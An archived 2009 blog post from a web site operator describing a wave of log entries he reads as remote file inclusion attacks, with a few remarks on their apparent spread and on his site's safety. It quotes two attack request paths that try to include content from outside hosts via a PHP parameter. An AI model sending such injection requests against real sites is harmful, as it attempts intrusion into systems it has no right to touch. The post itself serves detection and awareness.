Main Content

Baby Caleb and Fortune City in your web logs?

Archive - Originally posted on "The Horse's Mouth" - 2009-01-31 08:26:08 - Graham Ellis

Our web site logs are getting a lot of requests containing "babycaleb" and "fortunecity" ... looking for URLs such as these:
/resources/ex.php4?item=http://babycaleb.fortunecity.co.uk/picture.htm?
/resources/ex.php4?item=http://64.15.67.17/~artatgig/caleb.htm?

and said to be from an Internet Explorer browser (user agent).

Hmmm ... they look like injection attacks to me, where someone is attempting to include his / her content into our pages. And because the requests come from a lot of different places, there's something viral about the attack - so that when it gets in to somewhere, it's not only feeding whatever the content is via that page if it can, but it's also taking over that machine and using it to attack further machines.

I have not looked all that deep, but I have checked that we're not vulnerable to the attack (save that it's using bandwidth - 12,000 requests out of 140,000 to our server yesterday!) and found some other pages - here and here which are safe to visit and will tell you a little more.